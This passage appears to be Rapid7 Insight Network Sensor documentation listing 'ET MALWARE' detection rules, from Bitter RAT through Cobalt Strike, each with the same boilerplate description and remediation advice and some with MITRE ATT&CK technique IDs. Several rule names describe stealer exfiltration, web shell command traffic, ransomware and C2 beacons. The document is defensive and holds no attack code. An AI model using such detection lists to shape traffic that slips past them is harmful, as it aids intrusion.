This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bitter RAT HTTP CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Bitter RAT HTTP CnC Beacon M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE BKDR_BTMINE.MNR BitCoin Miner Retrieving New Malware From Server

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BKDR_BTMINE.MNR BitCoin Miner Retrieving Server IP Addresses

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BKDR_BTMINE.MNR BitCoin Miner Server Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BKDR_SLOTH.A Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Blackbeard Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Blackenergy Bot Checkin to C&C

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Blackenergy Bot Checkin to C&C (2)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BlackEnergy POST Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BlackEnergy v2 POST Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BlackEnergy v2.x HTTP Request with Encrypted Variables

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BlackEnergy v2.x Plugin Download Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BlackMatter CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Blackmoon/Banbra Configuration Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Blackmoon/Banbra Configuration Request M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BlackshadesRAT Reporting

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BlackTech Plead Encrypted Payload Inbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BlackTech/PLEAD TSCookie CnC Checkin M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BlackTech/PLEAD TSCookie CnC Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Blaze/Supreme Bot Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Blaze/Supreme Bot Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BleachGap Ransomware Checkin (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Blue Bot DDoS Blog Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Blue Bot DDoS Logger Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Blue Bot DDoS Proxy Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Blue Bot DDoS Target Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bolek HTTP Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Book of Eli CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bookworm CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Bookworm CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Bossabot DDoS tool RFI attempt

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bot Backdoor Checkin/registration Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BOUNCEBEAM Backdoor CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Bravix Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Brazilian Banker SSL Cert

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bredolab CnC URL Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Bredolab Downloader Communicating With Controller (1)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BroBot POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Brontok/Joseray User-Agent Detected (Joseray.A3 Browser)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Brontok User-Agent Detected (Brontok.A3 Browser)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Brontok User-Agent Detected (Rivest)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BrushaLoader CnC Domain in SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Buer - DomainInfo User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Buer Loader Download Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Buer Loader Successful Payload Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Buer Loader Update Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Buer Loader Update Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BUILDINGCAN CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Buran Ransomware Activity M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Buran Ransomware Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE BYOB - Python Backdoor Loader Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BYOB - Python Backdoor Stager Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE C3Pool CoinMiner Setup Script Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Resource Hijacking - T1496

ET MALWARE Campo Loader Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Capfire4 Checkin (register machine)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE carberp check in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Carberp checkin task

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Carberp CnC request POST /set/task.html

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Carberp file download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Casbaneiro CnC Host Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cashout Proxy Bot reg_DST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cayosin Botnet User-Agent Observed M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cayosin Botnet User-Agent Observed M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CBeplay Downloading Design

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CBReplay Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CBReplay.P Ransomware

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE CenterPOS CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CenterPOS Delete Plugins

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CenterPOS Load Plugins

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CerberTear Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE ChaChi RAT Client CnC (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ChaChi RAT Client CnC (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ChaChi RAT Server Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Chafer Win32/TREKX Uploading to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Chafer Win32/TREKX Uploading to CnC (Modified CAB)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ChaseBot CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Chinotto CnC Activity (command)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Chinotto CnC Activity (file)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Chinotto CnC Activity (hello)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Chinotto CnC Activity (result)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Chthonic Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Chthonic Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Chthonic CnC Beacon 5

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Chthonic CnC Beacon 6

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Citadel Activity POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Citadel Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cknife Shell Command Struct Inbound (aspx)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cknife Shell Command Struct Inbound (PHP)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Click Fraud Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ClipBanker Variant Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Clipsa Stealer - CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Clipsa Stealer - Coinminer Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Resource Hijacking - T1496

ET MALWARE Clipsa Stealer - Exfiltration Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CloudAtlas APT Maldoc Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cloud Atlas CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE CNRarypt Ransomware CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Cobalt Group SSL Certificate Detected

Description
Copy link

Recommendation
Copy link

ET MALWARE Cobalt Strike Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cobalt Strike Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cobalt Strike Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

